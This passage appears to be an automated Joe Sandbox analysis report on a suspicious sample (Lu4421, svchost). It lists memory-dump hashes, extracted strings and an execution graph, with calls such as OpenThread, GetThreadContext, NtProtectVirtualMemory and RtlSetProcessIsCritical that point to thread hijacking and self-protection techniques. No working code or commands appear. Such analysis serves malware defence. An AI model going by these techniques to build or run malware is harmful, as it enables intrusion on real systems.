                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 25aac3d49cbdb054571cb91f202f2295fc0b739a83f226da1fb42552db6ff551
                                                                                  • Instruction ID: fdb0161aa6dfa24f9e4472cae39a80243032b598e50674f281b719b512fd2911
                                                                                  • Opcode Fuzzy Hash: 25aac3d49cbdb054571cb91f202f2295fc0b739a83f226da1fb42552db6ff551
                                                                                  • Instruction Fuzzy Hash: C7E0DF3046C3C44FC705BB3088659A57FF0EF49304F8409AAECC8C61A3CA2C8249C723
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 23fac1ce08420eb88c6c588506b7c768d87e20478aa3945213180793d8082417
                                                                                  • Instruction ID: 96348a75d2d28182134964428ee971fafd88430b7ad43c8c2994ad0e35e187f6
                                                                                  • Opcode Fuzzy Hash: 23fac1ce08420eb88c6c588506b7c768d87e20478aa3945213180793d8082417
                                                                                  • Instruction Fuzzy Hash: 1AD02B1074A94A0FCB0426B908651F537C19F4512078800F2DC48CB2A3E80CD9CD8360
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8235fe2bec13dcf765980073eb95a2af5f1c0f1934f3c65b7127be4f58134dc4
                                                                                  • Instruction ID: fa1dec7da6ed407a457a1e3717af9ee4c4aaee6d4e7335ff96bdb53073de706b
                                                                                  • Opcode Fuzzy Hash: 8235fe2bec13dcf765980073eb95a2af5f1c0f1934f3c65b7127be4f58134dc4
                                                                                  • Instruction Fuzzy Hash: 24D02B11F4990E09EB04B7B0183A9FEF266DF84300FC24475D42DC20DBCC1D250001C2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cbed845b4acb17ec77cfd86d4f14a283bab66724b713d41c0cfb36233503d366
                                                                                  • Instruction ID: 8a268b70e94bd81f5b6eee71268621e5f8fc4eb9f60fe1460206c8a041234a8b
                                                                                  • Opcode Fuzzy Hash: cbed845b4acb17ec77cfd86d4f14a283bab66724b713d41c0cfb36233503d366
                                                                                  • Instruction Fuzzy Hash: CCD01225F5591E49EB54B774283A9FDB2A6DF89204FD24876D42DC20DBDD1D29010181
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 36915abad95e9bb5914491dc8f717a630ca13e80ebf5cc755be93a7db2c3dbf7
                                                                                  • Instruction ID: a934f54de98518ada63556995a2e2143bf2c7d96a4f5a012d7b161ed8fd20d5e
                                                                                  • Opcode Fuzzy Hash: 36915abad95e9bb5914491dc8f717a630ca13e80ebf5cc755be93a7db2c3dbf7
                                                                                  • Instruction Fuzzy Hash: F5D0A731F0480D4E9F90FB9C60556FDB7E1DF88215F440033D50CD3191CD1414424381
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9b7069dd7b2d2cee10dfab8fb782da76b567093c36b068d9504cafdd4b3712ac
                                                                                  • Instruction ID: 7befc608a2fe3654218c2656b91bcd049dafc5ad57151da4cfa5e4d643660ce9
                                                                                  • Opcode Fuzzy Hash: 9b7069dd7b2d2cee10dfab8fb782da76b567093c36b068d9504cafdd4b3712ac
                                                                                  • Instruction Fuzzy Hash: 2CD05E22B14C490BA388EABC486932932C3DF8A338B55C334A83DD32D9DE245C021712
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 50747e73f40024901f0a54bdd5b7d36f5b000c61ec3249b52c5c61945a5dc641
                                                                                  • Instruction ID: 64cea9b9394f98dafa91f7f8cef6ce879599479ba87177dfc335600a92253eba
                                                                                  • Opcode Fuzzy Hash: 50747e73f40024901f0a54bdd5b7d36f5b000c61ec3249b52c5c61945a5dc641
                                                                                  • Instruction Fuzzy Hash: B4D05B3151C74D4BC354DF14E4505DAB7A0FF81324F400B3DF06A831E5DE6596858682
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ae734dadbeb0e66981049dda344b69998a56c55535d9cf7c510df33463077aa7
                                                                                  • Instruction ID: 354b4b3d921a4d2aa65ee70686d5265db1135880e33f619d0a15f2b646679444
                                                                                  • Opcode Fuzzy Hash: ae734dadbeb0e66981049dda344b69998a56c55535d9cf7c510df33463077aa7
                                                                                  • Instruction Fuzzy Hash: 14D05E3291CB0D4BC315DF14E4508DAB7B0FF88328F440B3DE0AE921E9DF6893818686
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a1891240270a2556ccd33c754778626767371eb82577f276abb11889f150f05a
                                                                                  • Instruction ID: d111adf8221e99334e1a3225c6da3e2f348242c356c9bf1aaa896e83803d3a93
                                                                                  • Opcode Fuzzy Hash: a1891240270a2556ccd33c754778626767371eb82577f276abb11889f150f05a
                                                                                  • Instruction Fuzzy Hash: 71D0A710F5D6856BE34573F85826B9D65E19FC5210F7181B9E44DC35E7DC0C68058327
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6c4eaa5ac530b2666618335e037d8d17d5eef5dd81574435454a90e4c29c683b
                                                                                  • Instruction ID: 88cad657e66971e92b15bf3c132874bd3216063f1eed6c45cf07ed7ba8828bd1
                                                                                  • Opcode Fuzzy Hash: 6c4eaa5ac530b2666618335e037d8d17d5eef5dd81574435454a90e4c29c683b
                                                                                  • Instruction Fuzzy Hash: 69D05E20B4C5816BD34573F8541ABADB6E19F95310F2041A9E409C35D7CC5C98818352
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6094c1ee3df90c18b1826e14b1cb78b168264d65e1df407c356db372f79aeb1f
                                                                                  • Instruction ID: 0becfa7eab965494d4da4afd385cd6ea17b028bd46d19f2fdb6838960cc62f92
                                                                                  • Opcode Fuzzy Hash: 6094c1ee3df90c18b1826e14b1cb78b168264d65e1df407c356db372f79aeb1f
                                                                                  • Instruction Fuzzy Hash: E7D05B3250C7094BC344DF04D4904DA77A1FF94324F440B3DE0AD951E5DF6893828686
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 687e0e2c6866620ec4745417c88304b6e29e69dc4dda75d87d5b5522e2331dc1
                                                                                  • Instruction ID: ff11e60b9f9c7e80b980319149853bc4310ee1fdf2c990c0ae03e2f1ae6236c3
                                                                                  • Opcode Fuzzy Hash: 687e0e2c6866620ec4745417c88304b6e29e69dc4dda75d87d5b5522e2331dc1
                                                                                  • Instruction Fuzzy Hash: 76C0123265C64D47D311AA50E4518EEB360EF91314F440F39F04A460A9ED6A6A958586
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bcb73b7f5ba8a81c7689c01a8b106210b9d5e35b3f9c45999fdb6ba20355eacf
                                                                                  • Instruction ID: 1080b652435edc98a303b7bb699a29333d95d75633638ac18cb91c39242f7b6f
                                                                                  • Opcode Fuzzy Hash: bcb73b7f5ba8a81c7689c01a8b106210b9d5e35b3f9c45999fdb6ba20355eacf
                                                                                  • Instruction Fuzzy Hash: 9EC04C12B6A54EC9E57467D464222FDB211DF496A2F520132C25AC1191CD4E261015C2
                                                                                  APIs
                                                                                  • OpenThread.KERNEL32(A848C3AF0FF675CB,?,?,-12175FEC,00000000,Function_00658E77,01265F2C,FFFACFE9000061A4,00000000,00000000), ref: 011AF625
                                                                                  • OpenThread.KERNEL32 ref: 011AF6BB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: OpenThread
                                                                                  • String ID: HoS
                                                                                  • API String ID: 3092547327-1171368488
                                                                                  • Opcode ID: 3b3766579aec45e5da8ebc09b021071bb72cef53e6c8ded242f601e0651796cc
                                                                                  • Instruction ID: b76f7be400553c08a0eab57d9ecadc2ab437bacc46fac57c718682c3ce2a334b
                                                                                  • Opcode Fuzzy Hash: 3b3766579aec45e5da8ebc09b021071bb72cef53e6c8ded242f601e0651796cc
                                                                                  • Instruction Fuzzy Hash: 5BB1FFBBA09A01CFD32D8E39D8416ED3BB1E348768F864E16CF4547B5DD73464A68B01
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8ze@
                                                                                  • API String ID: 0-602619046
                                                                                  • Opcode ID: daa42f7b4e63ac29d297ad2843e41827590ef2ee3bb6ee077a437b85d7583511
                                                                                  • Instruction ID: 28ff30caf0b6fe4ee6fbc8fab2e3e86ea69db6f967de370b0ba65afbd4288b34
                                                                                  • Opcode Fuzzy Hash: daa42f7b4e63ac29d297ad2843e41827590ef2ee3bb6ee077a437b85d7583511
                                                                                  • Instruction Fuzzy Hash: 6DB1E0B7608640CFD7298F39C485AED3BB1E748B18BC54E16DB4947B0ECB34A466CB85
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32 ref: 011AF22E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 24740636-0
                                                                                  • Opcode ID: 8d36e95842ef906194a775cef9e3b67eacf1bf11023a8f30a70f3cb859bc6891
                                                                                  • Instruction ID: 60ae89a2d02b420c3886251c5faf8f971da7556929f7840c80bcd48ec8036cd1
                                                                                  • Opcode Fuzzy Hash: 8d36e95842ef906194a775cef9e3b67eacf1bf11023a8f30a70f3cb859bc6891
                                                                                  • Instruction Fuzzy Hash: 7CD05EBF505022CA83288FF950400DC3B91D795BBC3D90F22CE31926DDDB30A0628BD9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0\+t
                                                                                  • API String ID: 0-2513549349
                                                                                  • Opcode ID: cd6497cb6133322ef6ca442cc93ddebb34426f23af68b7e6bd24a6a6e507a7a3
                                                                                  • Instruction ID: f9827d11ddb65b3c747df80ddf938e9eadef69f15a2462ca50a3e69610df6332
                                                                                  • Opcode Fuzzy Hash: cd6497cb6133322ef6ca442cc93ddebb34426f23af68b7e6bd24a6a6e507a7a3
                                                                                  • Instruction Fuzzy Hash: 5751A95158F7C22FD35393B858665967FE19F83160B2E41EFD488CF0A7D84D584AC322
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8+t$([+t$08+t$@8+t$@[+t$P8+t$X8+t$h8+t$p8+t$x8+t
                                                                                  • API String ID: 0-2819705010
                                                                                  • Opcode ID: 89f9531d66155d854ad73901cedbd9806565b5b1da788441b2701ce8e9329375
                                                                                  • Instruction ID: 68f386cf98c6093e2c870bf7bd71ce73b23006c19ff3d66e132c01661cd8457f
                                                                                  • Opcode Fuzzy Hash: 89f9531d66155d854ad73901cedbd9806565b5b1da788441b2701ce8e9329375
                                                                                  • Instruction Fuzzy Hash: 1DB11421A4E7C99FD7628BB450655D57FF0DF06230B2A02EAC884DF4B7E81CAD86C712
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (8+t$(8+t$0[+t$88+t$88+t$@[+t$@[+t$@[+t$H8+t$H8+t
                                                                                  • API String ID: 0-723544440
                                                                                  • Opcode ID: 8341c0168d7f3ec60e226020a10ff87c3a521a553b60789ddb1f7310a66fdbf1
                                                                                  • Instruction ID: 3d179675f5ae8cc0b2e173541d023656444d70da4db739b9efb4b95c1c4a5db5
                                                                                  • Opcode Fuzzy Hash: 8341c0168d7f3ec60e226020a10ff87c3a521a553b60789ddb1f7310a66fdbf1
                                                                                  • Instruction Fuzzy Hash: 9041233024D7899FC766DFB898665967BE0EF0623036405EEC4C6CF1A6DA2CEC46C741
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$ContextSuspend
                                                                                  • String ID: 8ze@
                                                                                  • API String ID: 3869801871-602619046
                                                                                  • Opcode ID: e2e49c63ee166648cad4e42db64edfe8d60a693c42b8f5343a54cea94099546b
                                                                                  • Instruction ID: 63b311252fc4c5321e16fc82e091e538dbf97a70c0a8d2b2b7edc66b9c897a35
                                                                                  • Opcode Fuzzy Hash: e2e49c63ee166648cad4e42db64edfe8d60a693c42b8f5343a54cea94099546b
                                                                                  • Instruction Fuzzy Hash: 4181AEBBA08A00CFD3298F39C445AED3BB1F748718B854E15DB8547B4ECB34A466CB95
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2040975054.0000000000EEA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2040847268.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040906535.0000000000EE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040926513.0000000000EE8000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001265000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2040975054.0000000001274000.00000040.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.2041986575.0000000001474000.00000040.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_b50000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$ContextSuspend
                                                                                  • String ID:
                                                                                  • API String ID: 3869801871-0
                                                                                  • Opcode ID: af0167766193ae95b7fe03570cdab8c8a8d3511a709267d932d5c06689703557
                                                                                  • Instruction ID: dc43f6de5ad02e698b7b031a04685ddbab127c40a8d2663e83f8ec31b847179a
                                                                                  • Opcode Fuzzy Hash: af0167766193ae95b7fe03570cdab8c8a8d3511a709267d932d5c06689703557
                                                                                  • Instruction Fuzzy Hash: 3581F3B7609680CFD3298F38D841AED3BB1E744728BC64E16CB5507B5DCB34A4A6CB44
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2049539614.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b7f0000_Lu4421.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @\+t$H\+t$P\+t$X\+t
                                                                                  • API String ID: 0-1589304457
                                                                                  • Opcode ID: 2d5e08a9186276df3afd427ab7bf4b391d1eb7635a952f7672f26f74accf550c
                                                                                  • Instruction ID: e427a4a5a06f612b6bfed35c83f02b8b7e081294ec31ce65409e8cc802705efa
                                                                                  • Opcode Fuzzy Hash: 2d5e08a9186276df3afd427ab7bf4b391d1eb7635a952f7672f26f74accf550c
                                                                                  • Instruction Fuzzy Hash: 6711C13064954D8FCB86EFA8C8549ED7BF1FF4532071500EAC449EB1A2D72CAC86CB10

                                                                                  Execution Graph

                                                                                  Execution Coverage:22.9%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:15.1%
                                                                                  Total number of Nodes:53
                                                                                  Total number of Limit Nodes:5
                                                                                  execution_graph 5316 7ffd9b7d7c7c 5319 7ffd9b7d7430 5316->5319 5320 7ffd9b7d8000 5319->5320 5323 7ffd9b7d7420 5320->5323 5322 7ffd9b7d7c87 5324 7ffd9b7d81e0 5323->5324 5330 7ffd9b7d7408 5324->5330 5326 7ffd9b7d81f1 5327 7ffd9b7d81f6 5326->5327 5335 7ffd9b7d7418 5326->5335 5327->5322 5329 7ffd9b7d8294 5329->5322 5331 7ffd9b7d8270 5330->5331 5332 7ffd9b7d7418 NtProtectVirtualMemory 5331->5332 5334 7ffd9b7d829c 5331->5334 5333 7ffd9b7d8294 5332->5333 5333->5326 5337 7ffd9b7d84b0 5335->5337 5336 7ffd9b7d861b 5336->5329 5337->5336 5338 7ffd9b7d87a4 NtProtectVirtualMemory 5337->5338 5339 7ffd9b7d87e5 5338->5339 5339->5329 5344 7ffd9b7d7b55 5345 7ffd9b7d7b5f 5344->5345 5348 7ffd9b7d04b8 5345->5348 5347 7ffd9b7d7c4c 5350 7ffd9b7d7da0 5348->5350 5349 7ffd9b7d7f0b 5349->5347 5350->5349 5351 7ffd9b7d7420 NtProtectVirtualMemory 5350->5351 5352 7ffd9b7d812f 5351->5352 5352->5347 5340 7ffd9b7d89f5 5341 7ffd9b7d8a1f RtlSetProcessIsCritical 5340->5341 5343 7ffd9b7d8ab0 5341->5343 5362 7ffd9b7d81d8 5363 7ffd9b7d7408 NtProtectVirtualMemory 5362->5363 5364 7ffd9b7d81f1 5362->5364 5363->5364 5365 7ffd9b7d7418 NtProtectVirtualMemory 5364->5365 5367 7ffd9b7d81f6 5364->5367 5366 7ffd9b7d8294 5365->5366 5368 7ffd9b7d8708 5369 7ffd9b7d870f NtProtectVirtualMemory 5368->5369 5371 7ffd9b7d87e5 5369->5371 5353 7ffd9b7d7ff8 5354 7ffd9b7d8000 5353->5354 5355 7ffd9b7d7420 NtProtectVirtualMemory 5354->5355 5356 7ffd9b7d812f 5355->5356 5357 7ffd9b7d7d8d 5359 7ffd9b7d7da0 5357->5359 5358 7ffd9b7d7f0b 5359->5358 5360 7ffd9b7d7420 NtProtectVirtualMemory 5359->5360 5361 7ffd9b7d812f 5360->5361 5372 7ffd9b7d847e 5373 7ffd9b7d84b0 5372->5373 5374 7ffd9b7d861b 5373->5374 5375 7ffd9b7d87a4 NtProtectVirtualMemory 5373->5375 5376 7ffd9b7d87e5 5375->5376

                                                                                  Control-flow Graph

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2958525442.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7d0000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 50696c639d9b07bf93d6f6bb6e97adf519ca5497d258247584bfed8d91a77917
                                                                                  • Instruction ID: 389d98584a525e18ad6d746f9e5089dff75212ec7f7b2a01094c020417d381fc
                                                                                  • Opcode Fuzzy Hash: 50696c639d9b07bf93d6f6bb6e97adf519ca5497d258247584bfed8d91a77917
                                                                                  • Instruction Fuzzy Hash: FDC10731E0CA0D4FE71DAB6898566FA77E1EF95320F44427ED05BC31EAED6878068781

                                                                                  Control-flow Graph

control_flow_graph: block 7ffd9b7d8708-7ffd9b7d87e3 (calls NtProtectVirtualMemory) -> 7ffd9b7d87eb-7ffd9b7d8816; 7ffd9b7d8708-7ffd9b7d87e3 -> 7ffd9b7d87e5 -> 7ffd9b7d87eb-7ffd9b7d8816
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2958525442.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7d0000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 2706961497-0
                                                                                  • Opcode ID: 976bbe6d6e9948f463c5f2cb95f457656e8aa277f929dc5ca310297bc94cab1a
                                                                                  • Instruction ID: ebe2c947691913ecd9765f4ca0f98d9fc9aa6acb08376d773f2e714aa4ab7d48
                                                                                  • Opcode Fuzzy Hash: 976bbe6d6e9948f463c5f2cb95f457656e8aa277f929dc5ca310297bc94cab1a
                                                                                  • Instruction Fuzzy Hash: 8731C531A0CB4C8FDB18DB5C98166ED77E1EB98320F00426FE04ED3296CA75A8058BC1

                                                                                  Control-flow Graph

control_flow_graph: block 7ffd9b7d89f5-7ffd9b7d8aae (calls RtlSetProcessIsCritical) -> 7ffd9b7d8ab6-7ffd9b7d8ad8; 7ffd9b7d89f5-7ffd9b7d8aae -> 7ffd9b7d8ab0 -> 7ffd9b7d8ab6-7ffd9b7d8ad8
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.2958525442.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_7ffd9b7d0000_svchost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2695349919-0
